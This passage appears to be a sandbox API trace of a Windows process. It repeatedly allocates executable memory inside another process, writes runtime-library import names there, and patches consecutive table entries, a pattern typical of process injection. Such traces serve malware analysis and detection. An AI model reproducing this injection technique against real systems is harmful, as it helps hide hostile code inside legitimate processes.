	[0240.231] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.231] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.231] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.231] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.231] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2b8, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.232] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.232] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.232] lstrlenA (lpString="_initterm") returned 9
	[0240.232] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.232] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce36*, nSize=0xa, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce36*, lpNumberOfBytesWritten=0x12858c*=0xa) returned 1
	[0240.233] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.233] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.233] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.233] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.233] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.234] ResetEvent (hEvent=0x680) returned 1
	[0240.234] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.234] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.234] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.234] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.234] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.234] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2bc, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.235] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.235] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.235] lstrlenA (lpString="_iob") returned 4
	[0240.235] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.235] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce42*, nSize=0x5, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce42*, lpNumberOfBytesWritten=0x12858c*=0x5) returned 1
	[0240.235] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.235] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.235] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.235] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.236] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.236] ResetEvent (hEvent=0x680) returned 1
	[0240.236] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.236] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.237] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.237] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.237] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.237] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2c0, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.237] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.237] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.237] lstrlenA (lpString="_lock") returned 5
	[0240.237] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.238] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce4a*, nSize=0x6, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce4a*, lpNumberOfBytesWritten=0x12858c*=0x6) returned 1
	[0240.238] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.238] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.238] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.238] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.239] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.239] ResetEvent (hEvent=0x680) returned 1
	[0240.239] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.239] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.239] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.239] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.239] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.239] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2c4, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.240] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.240] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.240] lstrlenA (lpString="_onexit") returned 7
	[0240.240] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.240] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce52*, nSize=0x8, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce52*, lpNumberOfBytesWritten=0x12858c*=0x8) returned 1
	[0240.241] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.241] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.241] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.241] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.242] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.242] ResetEvent (hEvent=0x680) returned 1
	[0240.242] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.242] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.242] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.242] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.242] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.243] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2c8, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.243] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.243] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.243] lstrlenA (lpString="_snwprintf_s") returned 12
	[0240.243] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.243] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce5c*, nSize=0xd, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce5c*, lpNumberOfBytesWritten=0x12858c*=0xd) returned 1
	[0240.244] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.244] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.244] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.244] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.244] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.245] ResetEvent (hEvent=0x680) returned 1
	[0240.245] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.245] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.245] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.245] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.245] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.245] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2cc, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.246] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.246] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.246] lstrlenA (lpString="calloc") returned 6
	[0240.246] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.246] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce6c*, nSize=0x7, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce6c*, lpNumberOfBytesWritten=0x12858c*=0x7) returned 1
	[0240.247] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.247] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.247] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.247] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.247] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.247] ResetEvent (hEvent=0x680) returned 1
	[0240.247] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.248] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.248] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.248] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.248] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.248] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2d0, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.248] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.249] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.249] lstrlenA (lpString="fputc") returned 5
	[0240.249] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.249] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce76*, nSize=0x6, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce76*, lpNumberOfBytesWritten=0x12858c*=0x6) returned 1
	[0240.249] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.249] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.249] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.249] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.250] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.250] ResetEvent (hEvent=0x680) returned 1
	[0240.250] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.250] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.250] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.251] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.251] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.251] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2d4, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.251] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.251] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.251] lstrlenA (lpString="free") returned 4
	[0240.251] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.251] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce7e*, nSize=0x5, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce7e*, lpNumberOfBytesWritten=0x12858c*=0x5) returned 1
	[0240.252] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.252] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.252] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.252] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.252] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.253] ResetEvent (hEvent=0x680) returned 1
	[0240.253] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.253] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.253] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.253] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.253] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.253] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2d8, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.254] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.254] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.254] lstrlenA (lpString="fwrite") returned 6
	[0240.254] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.254] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce86*, nSize=0x7, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce86*, lpNumberOfBytesWritten=0x12858c*=0x7) returned 1
	[0240.255] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.255] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.255] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.255] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.255] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.256] ResetEvent (hEvent=0x680) returned 1
	[0240.256] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.256] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.256] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.256] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.256] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.256] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2dc, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.257] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.257] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.257] lstrlenA (lpString="getenv") returned 6
	[0240.257] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.257] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bce90*, nSize=0x7, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bce90*, lpNumberOfBytesWritten=0x12858c*=0x7) returned 1
	[0240.257] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.257] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.258] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.258] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.258] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.258] ResetEvent (hEvent=0x680) returned 1
	[0240.258] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.259] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.259] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.259] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.259] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.259] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f2e0, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.259] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.260] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.260] lstrlenA (lpString="localeconv") returned 10
	[0240.260] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
